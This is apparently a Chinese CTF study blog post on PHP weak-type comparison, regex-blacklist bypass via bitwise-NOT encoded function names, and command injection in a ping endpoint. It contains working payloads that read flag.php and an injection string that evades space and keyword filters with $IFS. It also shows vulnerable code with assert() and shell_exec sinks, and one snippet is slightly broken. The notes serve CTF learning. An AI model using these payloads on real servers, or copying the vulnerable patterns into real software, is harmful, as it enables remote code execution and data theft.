CTF夺旗-PHP弱类型&异或取反&序列化&RCE
PHP-相关总结知识点
1 ctf变量
2 php的弱类型比较问题
3 php断言(assert)
4 php读取目录下文件的方法
5 preg_match绕过
6 PHP中sha1()函数和md5()
1 异或注入
2 updatexml()函数报错注入
3 源文件泄露利用
4 extract变量覆盖
5 strcmp()漏洞
6 md5()漏洞
7 ereg()截断漏洞
8 弱类型整数大小比较绕过
1 命令执行
2 md5()漏洞
3 escapeshellarg()与escapeshellcmd()
4 sql注入绕过关键字
5 preg_replace/e的命令执行漏洞
6 MYSQL特殊模式
7 PHP字符串解析特性PHP-弱类型对比绕过测试
- https://www.cnblogs.com/Mrsm1th/p/6745532.html
===在进行比较的时候,会先判断两种字符串的类型是否相等,再比较==在进行比较的时候,会先将字符串类型转化成相同,再比较
//对函数类型有限制
<?php
$num=$_GET['num'];
if (!is_numeric($num)){
echo $num;
if($num==l)
echo 'flag{*****flag****} ';
?>
//indexl.php?num=1x
//indexl.php?num=1%0a传参1x,得到flag
PHP-正则preg_match绕过
ctf中preg_match绕过技术
- 异或
- 取反
- 数组
- PCRE
- 换行符
<?php
error_reporting(0);
if(!isset($_GET['code'])){
highlight_file(__FILE__);
}else{
$code = $_GET['code'];
if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) {
die('You are too good for me');
}
$blacklist = get_defined_functions()['internal'];
foreach ($blacklist as $blackitem) {
if (preg_match ('/' . $blackitem . '/im', $code)) {
die('You deserve better');
}
}
assert($code);
}第一个正则表达式过滤了很多字符且不区分大小写。第二个正则表达式过滤了PHP的内置函数,因此即使找到了某个函数恰好可以绕过第一个,也过不去第二个过滤。这样的题目,一般的思路就是利用异或或者取反来绕过。这里用取反来绕过
- 首先打印当前目录下的文件:
print_r(scandir('.'))
<?php
echo urlencode(~'print_r'); //urlencode url编码 ~ 取反
echo "\n";
echo urlencode(~'scandir');
echo "\n";
echo urlencode(~'.');
?><br><br>//生成payload:/?code=(~%8F%8D%96%91%8B%A0%8D)((~%8C%9C%9E%91%9B%96%8D)((~%D1)))
- 然后显示flag内容:
highlight_file('flag.php')
<?php
echo urlencode(~'highlight_file');
echo "\n";
echo urlencode(~'flag.php');
?>
//生成payload:/?code=(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)((~%99%93%9E%98%D1%8F%97%8F))
PHP-命令执行RCE变异绕过
- https://www.cnblogs.com/iloveacm/p/13687654.html
- https://buuoj.cn/challenges#[GXYCTF2019]Ping Ping Ping
场景打开如下,猜测有命令执行漏洞
使用管道符,成功列出当前目录下文件
尝试读取flag文件,失败,发现过滤了空格、特殊字符、关键字flag等
使用变量拼接的方式,成功绕过,得到flag
/?ip=127.0.0.1;a=g;cat$IFS$2fla$a.php
同样,也可以查看网页源代码,分析绕过规则
/?ip=127.0.0.1;cat$IFS$2index.php
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
Alipay
Wechat
最后一次更新于2022-06-16 09:48
0 条评论